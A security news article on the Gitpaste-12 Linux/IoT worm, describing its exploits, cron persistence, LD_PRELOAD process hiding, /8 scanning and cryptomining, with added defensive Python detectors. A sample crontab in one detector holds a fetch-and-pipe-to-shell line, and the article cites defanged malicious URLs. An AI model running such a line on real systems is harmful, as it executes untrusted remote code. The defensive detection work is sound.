
Nasty Worm About! – Gitpaste-12 Worm Targets Linux Servers, IoT Devices!


Researchers have found a new worm targeting Linux-based x86 servers, as well as Linux internet of things (IoT) devices based on ARM & MIPS CPUs.

The newly discovered malware uses GitHub and Pastebin to house component code, & harbours 12 different initial attack vectors.

The malware hosts its malicious component code on GitHub & Pastebin & has at least 12 different attack modules available, leading researchers to name it “Gitpaste-12.” It was first detected by Juniper Threat Labs in attacks on Oct. 15, 2020.

Lateral Spread

“No malware is good to have, but worms are particularly annoying,” commented researchers with Juniper Threat Labs in a Thursday post. “Their ability to spread in an automated fashion can lead to lateral spread within an organisation or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organisation.”

The first phase of the attack is the initial system compromise. The malware’s attack modules include exploits for 11 previously disclosed vulnerabilities, among them flaws in Apache Struts (CVE-2017-5638), Asus routers (CVE-2013-5948), the Webadmin plugin for OpenDreambox (CVE-2017-14135) & Tenda routers (CVE-2020-10987).

The malware attempts to use known exploits for these flaws to compromise systems & may also attempt to brute-force passwords, observed researchers. After compromising a system, it uploads a main shell script to the victim machine, which then starts downloading & executing the other components of Gitpaste-12.

The Malware

This script sets up a cron job that it downloads from Pastebin. (A cron job is a task run on a schedule by cron, the time-based job scheduler in Unix-like operating systems.) The cron job fetches a script & executes it again every minute; researchers believe this is presumably one mechanism by which updates can be pushed to the botnet.
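An every-minute cron entry that re-fetches a remote script and pipes it into a shell is a hunting opportunity for defenders. The following Python is an added example, not code from the article or from Juniper’s report: it parses user-crontab text and flags entries with that shape. The sample crontab, the backup job and the PLACEHOLDER paste path are constructed.

```python
import re
from typing import List, Tuple

# Constructed sample crontab (not from the article): one benign backup job and one
# entry shaped like the Gitpaste-12 updater, which re-fetches and runs a paste every minute.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
30 2 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
* * * * * curl -fsSL https://pastebin.com/raw/PLACEHOLDER | sh
"""

FETCHERS = re.compile(r"\b(curl|wget)\b")
PASTE_HOSTS = re.compile(r"(pastebin\.com|raw\.githubusercontent\.com)", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da|z)?sh\b")
EVERY_MINUTE = ("* * * * *", "*/1 * * * *")

def parse_crontab(text: str) -> List[Tuple[int, str, str]]:
    """(line_no, schedule, command) for each job line of a user crontab; comments, blank
    lines and VAR=value assignments are skipped. (System /etc/crontab adds a user field.)"""
    jobs = []
    for no, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        fields = line.split(None, 5)
        if len(fields) == 6:
            jobs.append((no, " ".join(fields[:5]), fields[5]))
    return jobs

def suspicious_cron_entries(text: str) -> List[Tuple[int, List[str]]]:
    """(line_no, reasons) for jobs whose shape matches a remote-fetch updater."""
    findings = []
    for no, schedule, command in parse_crontab(text):
        fetch = bool(FETCHERS.search(command) and PIPE_TO_SHELL.search(command))
        reasons = []
        if schedule in EVERY_MINUTE:
            reasons.append("runs every minute")
        if fetch:
            reasons.append("downloads and pipes to a shell")
        if PASTE_HOSTS.search(command):
            reasons.append("references a paste/raw-content host")
        # Piping a download into a shell is enough on its own; the other two only count together.
        if fetch or len(reasons) >= 2:
            findings.append((no, reasons))
    return findings

if __name__ == "__main__":
    for no, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"line {no}: {'; '.join(reasons)}")
```

Run it against `crontab -l` output for each account and the files under /etc/cron.d to cover the persistence location the article describes.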

It then downloads a script from GitHub (https://raw[.]githubusercontent[.]com/cnmnmsl-001/-/master/shadu1) & executes it. The script contains comments in Chinese & gives attackers multiple commands for disabling different security capabilities.

Defences

These include stripping the system’s defences, including firewall rules, SELinux (a security architecture for Linux systems), AppArmor (a Linux kernel security module that lets the system administrator restrict programs’ capabilities), as well as common attack-prevention & monitoring software.

The malware also has some commands that disable cloud security agents, “which clearly indicates the threat player intends to target public cloud computing infrastructure provided by Alibaba Cloud & Tencent,” observed researchers.

Gitpaste-12 also features commands allowing it to run a crypto-miner that targets the Monero cryptocurrency.

Processes

“It also prevents administrators from collecting information about running processes by intercepting ‘readdir’ system calls & skipping directories for processes like tcpdump, sudo, openssl, etc. in ‘/proc’,” explained researchers. “The ‘/proc’ directory in Linux contains information about running processes.

It is used, for example, by the ‘ps’ command to show information about running processes. But unfortunately for this threat actor, this implementation does not do what they expect it to do.”

Code

Finally, the malware also contains a library (hide.so) that is loaded via LD_PRELOAD, which downloads & executes Pastebin files (https://pastebin[.]com/raw/Tg5FQHhf) that host further malicious code.
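A readdir hook loaded through LD_PRELOAD only filters the directory listing; it cannot stop a direct probe of /proc/&lt;pid&gt;, which is how the process-hiding described in the two preceding sections can be detected. This Python is an added example, not the article’s or Juniper’s code; it assumes the defender keeps an allow-list of libraries legitimately named in /etc/ld.so.preload (empty here) and reconciles the readdir view of /proc with a per-PID probe.

```python
import os
from typing import Callable, List, Set

# Assumption (not from the article): the defender keeps an allow-list of libraries legitimately
# present in /etc/ld.so.preload; on most hosts the file should not exist at all.
EXPECTED_PRELOADS: Set[str] = set()

def unexpected_preloads(preload_text: str, expected: Set[str] = EXPECTED_PRELOADS) -> List[str]:
    """Library paths named in ld.so.preload contents that are not on the allow-list."""
    libs = [ln.strip() for ln in preload_text.splitlines()]
    return [lib for lib in libs if lib and not lib.startswith("#") and lib not in expected]

def is_process(pid: int, proc: str = "/proc") -> bool:
    """True if /proc/<pid> is a thread-group leader. Reads the path directly, never via readdir;
    non-leader threads are reachable by path but are legitimately absent from the listing."""
    try:
        with open(f"{proc}/{pid}/status") as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) == pid
    except (OSError, ValueError):
        return False
    return False

def pids_via_readdir(proc: str = "/proc") -> Set[int]:
    """PIDs as the directory listing reports them; this is exactly what a readdir hook filters."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}

def pids_via_probe(pid_max: int, proc: str = "/proc") -> Set[int]:
    """PIDs found by probing every candidate path; slow (pid_max may be ~4M) but hook-resistant."""
    return {pid for pid in range(1, pid_max + 1) if is_process(pid, proc)}

def hidden_pids(listed: Set[int], probed: Set[int], recheck: Callable[[int], bool]) -> Set[int]:
    """Processes the probe sees but the listing omits, re-checked so that processes which
    merely started or exited between the two passes are dropped."""
    return {pid for pid in probed - listed if recheck(pid)}

if __name__ == "__main__":
    if os.path.exists("/etc/ld.so.preload"):
        with open("/etc/ld.so.preload") as fh:
            print("unexpected preloads:", unexpected_preloads(fh.read()))
    with open("/proc/sys/kernel/pid_max") as fh:
        pid_max = int(fh.read())
    listed, probed = pids_via_readdir(), pids_via_probe(pid_max)
    # Still alive by path yet still missing from a fresh listing: the hooked-readdir signature.
    still_hidden = lambda pid: is_process(pid) and pid not in pids_via_readdir()
    print("hidden pids:", sorted(hidden_pids(listed, probed, still_hidden)))
```

A hook that also filters stat() or open() would defeat the probe, so treat a non-empty ld.so.preload or a set LD_PRELOAD on a server as a finding in its own right.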

Researchers said they reported the Pastebin URL, as well as the Git repo mentioned above that downloads malicious scripts for the malware. The Git repo was closed on Oct. 30, 2020. “This should stop the proliferation of this botnet,” suggested researchers.

Wormable Features

In terms of its worming capabilities, Gitpaste-12 also contains a script that launches attacks against other machines, in an attempt to replicate & spread the malware.

“The malware chooses a random /8 CIDR for attack & will try all addresses within that range,” according to researchers. Classless Inter-Domain Routing (CIDR) is a method for allocating IP addresses & for IP routing; here it means the attack targets every IP address within the randomly chosen /8 range.

Another version of the script also opens ports 30004 & 30005 for reverse shell commands, outlined researchers. Port 30004 uses the Transmission Control Protocol (TCP), one of the main protocols in TCP/IP networks, while port 30005 is conventionally used by a bidirectional SOAP/HTTP-based protocol that provides communication between devices such as routers or network switches & auto-configuration servers.
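Because the worm sweeps a whole /8, an infected host stands out in flow or firewall logs as one source contacting many distinct addresses, on one port, spread across that /8. The Python below is an added example rather than anything from the article: it groups constructed flow records by source, /8 and destination port and flags sweeps; thresholds are kept low to fit the sample and would be far higher in production.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network
from typing import Dict, List, Set, Tuple

# Constructed flow records (not from the article), one "src dst dport" per line.
# 192.168.1.50 behaves like a Gitpaste-12 host sweeping 10.0.0.0/8; 192.168.1.20 is ordinary traffic.
SAMPLE_FLOWS = """\
192.168.1.20 10.1.2.3 443
192.168.1.20 10.1.2.4 443
192.168.1.50 10.3.4.5 80
192.168.1.50 10.77.1.2 80
192.168.1.50 10.200.9.9 80
192.168.1.50 10.10.10.10 80
192.168.1.50 10.1.2.3 80
192.168.1.50 10.254.0.7 80
"""

def parse_flows(text: str) -> List[Tuple[str, str, int]]:
    """(src, dst, dport) tuples; malformed lines are ignored."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[2].isdigit():
            rows.append((parts[0], parts[1], int(parts[2])))
    return rows

def detect_slash8_sweeps(text: str, min_targets: int = 5,
                         min_slash16s: int = 3) -> Dict[str, Tuple[str, int, int]]:
    """{src: (/8 network, dport, distinct targets)} for sources that contact at least
    min_targets distinct hosts on one port inside a single /8, spread over at least
    min_slash16s different /16s (a sweep of the range, not one busy subnet)."""
    # (src, /8, dport) -> distinct destination addresses seen
    buckets: Dict[Tuple[str, str, int], Set] = defaultdict(set)
    for src, dst, dport in parse_flows(text):
        slash8 = str(ip_network(f"{dst}/8", strict=False))
        buckets[(src, slash8, dport)].add(ip_address(dst))
    findings = {}
    for (src, slash8, dport), dsts in buckets.items():
        slash16s = {ip_network(f"{d}/16", strict=False) for d in dsts}
        if len(dsts) >= min_targets and len(slash16s) >= min_slash16s:
            findings[src] = (slash8, dport, len(dsts))
    return findings

if __name__ == "__main__":
    for src, (net, port, n) in detect_slash8_sweeps(SAMPLE_FLOWS).items():
        print(f"{src} swept {n} hosts in {net} on port {port}")
```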

Impact

Worms can have a wide impact, as seen in a 2019 campaign that used a wormable exploit for a vulnerability in the Exim mail transport agent (MTA) to gain remote command execution on victims’ Linux systems. Researchers commented at the time that more than 3.5m servers were at risk from the attacks.

Several new worms have appeared in 2020 so far, including the Golang worm, which is aimed at installing crypto-miners, & recently changed up its tactics to add attacks on Windows servers & a new pool of exploits to its methodology.

In Aug., a cryptomining worm from the group known as TeamTNT was found spreading through the Amazon Web Services (AWS) cloud & collecting credentials. Once the logins are harvested, the malware logs in & deploys the XMRig mining tool to mine Monero cryptocurrency.
